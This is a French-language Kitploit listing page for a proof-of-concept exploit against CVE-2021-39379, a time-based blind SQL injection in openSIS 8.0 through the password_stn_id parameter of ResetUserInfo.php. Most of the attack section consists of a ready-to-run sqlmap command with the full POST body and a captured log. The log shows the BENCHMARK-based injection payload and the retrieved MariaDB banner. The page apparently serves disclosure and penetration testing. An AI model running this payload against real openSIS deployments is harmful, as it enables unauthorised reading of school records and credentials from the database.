Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-39379 — Preuve de concept d'exploitation pour CVE-2021-39379, une vulnérabilité d'injection SQL dans openSIS 8.0 via le paramètre password_stn_id dans ResetUserInfo.php, permettant une injection SQL aveugle basée sur le temps contre MySQL/MariaDB. | Kitploit
Outils/GitHubGitHub/security-n/cve-2021-39379
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubsecurity-n/cve-2021-39379

CVE-2021-39379

Preuve de concept d'exploitation pour CVE-2021-39379, une vulnérabilité d'injection SQL dans openSIS 8.0 via le paramètre password_stn_id dans ResetUserInfo.php, permettant une injection SQL aveugle basée sur le temps contre MySQL/MariaDB.

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

VULNÉRABILITÉ D'INJECTION SQL OPENSIS 8.0 CVE-2021-39379

Une vulnérabilité d'injection SQL existe dans la version 8.0 d'openSIS lorsque MySQL (MariaDB) est utilisé comme base de données de l'application. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL (MariaDB) via le paramètre vulnérable password_stn_id.

Page PHP vulnérable :

ResetUserInfo.php

Charge utile vulnérable

sqlmap -u "http://localhost:8081/ResetUserInfo.php" --data="pass_user_type=pass_student&pass_type_form=password&password_stn_id=1234&uname=1234&month_password_dob=08&day_password_dob=01&year_password_dob=2021&pass_email=&password_stf_email=" --referer="http://localhost:8081/ForgotPass.php?language=en" --dbms="MySQL" --level=3 --risk=3 --banner --answers="crack=N,dict=N,continue=Y,quit=N"

Injection SQL:

http://localhost:8081/ResetUserInfo.php

root@kitploit:~
Parameter: password_stn_id (POST)
    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: pass_user_type=pass_student&pass_type_form=password&password_stn_id=1234 AND 1211=BENCHMARK(5000000,MD5(0x6a65474d))&uname=1234&month_password_dob=08&day_password_dob=01&year_password_dob=2021&pass_email=&password_stf_email=
    
[21:11:37] [INFO] testing MySQL
[21:11:44] [INFO] confirming MySQL
[21:11:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[21:11:56] [INFO] the back-end DBMS is MySQL
[21:11:56] [INFO] fetching banner
[21:11:56] [INFO] retrieved: 10.5.11-MariaDB-1
web application technology: PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.5.11-MariaDB-1'

Découvert par Nathan Johnson, août 2021

Télécharger l’outil